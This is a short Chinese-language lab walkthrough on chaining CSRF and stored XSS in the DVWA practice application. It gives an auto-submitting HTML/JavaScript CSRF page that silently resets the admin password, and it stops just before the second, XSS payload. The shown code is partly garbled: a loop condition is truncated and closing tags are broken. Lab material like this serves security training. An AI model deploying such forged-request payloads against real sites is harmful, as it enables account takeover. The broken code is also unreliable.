• CSRF+XSS组合


    环境:dvwa靶场+low等级+CSRF+XSS

    payload1

    将如下代码 1.html 放置攻击者web服务器中(dvwa靶场搭建的网站根目录)

    1. <body onload="javascript:fireForms()">
    2. <script language="JavaScript">
    3. var pauses = new Array( "42" );
    4. function pausecomp(millis){
    5. var date = new Date();
    6. var curDate = null;
    7. do { curDate = new Date(); }
    8. while(curDate-date < millis);}
    9. function fireForms(){
    10. var count = 1;
    11. var i=0;
    12. for(i=0; i
    13. document.forms[i].submit();
    14. pausecomp(pauses[i]);}}
    15. script>
    16. <form action="http://127.0.0.1/dvwa/vulnerabilities/csrf/">
    17. <input type="hidden" name="password_new" value="admin" />
    18. <input type="hidden" name="password_conf" value="admin" />
    19. <input type="hidden" name="Change" value="Change" />
    20. <input type="submit" value="Submit request" />
    21. form>
    22. body>
    23. html>

    注意:第18行的url是csrf页面,具体的IP、路径可能因人而异,注意修改

    payload2

    将如下代码插入到存在XSS的位置——sign guestbook